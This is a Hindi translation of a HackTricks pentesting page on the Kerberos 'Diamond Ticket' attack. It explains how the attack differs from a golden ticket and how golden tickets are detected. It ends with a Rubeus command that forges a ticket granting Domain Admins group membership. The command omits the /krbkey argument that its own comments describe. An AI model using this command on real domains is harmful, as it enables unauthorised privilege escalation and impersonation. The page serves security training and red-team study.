hacktricks/windows-hardening/active-directory-methodology/diamond-ticket.md
Translator workflow 75e8745ba3 Translated to Hindi
2023-11-06 08:38:02 +00:00

8.2 KiB

डायमंड टिकट

☁️ हैकट्रिक्स क्लाउड ☁️ -🐦 ट्विटर 🐦 - 🎙️ ट्विच 🎙️ - 🎥 यूट्यूब 🎥

डायमंड टिकट

स्वर्ण टिकट की तरह, डायमंड टिकट एक TGT है जिसका उपयोग किसी भी सेवा में किसी भी उपयोगकर्ता के रूप में करने के लिए किया जा सकता है। स्वर्ण टिकट पूरी तरह से ऑफलाइन बनाया जाता है, इसे उस डोमेन के krbtgt हैश के साथ एन्क्रिप्ट किया जाता है, और फिर इसे उपयोग के लिए एक लॉगऑन सत्र में पास किया जाता है। क्योंकि डोमेन कंट्रोलर TGT को ट्रैक नहीं करते हैं जिन्हें वह (या वे) वैध रूप से जारी किए हैं, वे खुशी-खुशी TGT को स्वीकार करेंगे जो उसके खुद के krbtgt हैश के साथ एन्क्रिप्ट किया गया है।

स्वर्ण टिकट का उपयोग खोजने के लिए दो सामान्य तकनीकें हैं:

  • उसके पास कोई संबंधित AS-REQ न होने वाले TGS-REQ खोजें।
  • उसके पास मिमीकेट्ज़ की डिफ़ॉल्ट 10 वर्ष की अवधि जैसे मूर्ख मान्यताएँ रखने वाले TGT खोजें।

एक डायमंड टिकट एक DC द्वारा जारी किए गए वैध TGT के क्षेत्रों को संशोधित करके बनाया जाता है। इसे एक TGT का अनुरोध करके प्राप्त किया जाता है, डोमेन के krbtgt हैश के साथ इसे डिक्रिप्ट किया जाता है, टिकट के वांछित क्षेत्रों को संशोधित किया जाता है, और फिर इसे पुनः एन्क्रिप्ट किया जाता है। यह एक स्वर्ण टिकट की दो पहले उल्लिखित कमियों को पार करता है क्योंकि:

  • TGS-REQ के पहले AS-REQ होंगे।
  • TGT एक DC द्वारा जारी किया गया था, जिसका मतलब है कि यह डोमेन के केरबेरोस नीति के सभी सही विवरण रखेगा। हालांकि, ये स्वर्ण टिकट में सटीकता से जाली बनाई जा सकती हैं, यह अधिक जटिल होता है और गलतियों के लिए खुला होता है।
# Get user RID
powershell Get-DomainUser -Identity <username> -Properties objectsid

.\Rubeus.exe diamond /tgtdeleg /ticketuser:<username> /ticketuserid:<RID of username> /groups:512

# /tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the user without needing to know their password, NTLM/AES hash, or elevation on the host.
# /ticketuser is the username of the principal to impersonate.
# /ticketuserid is the domain RID of that principal.
# /groups are the desired group RIDs (512 being Domain Admins).
# /krbkey is the krbtgt AES256 hash.

\

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥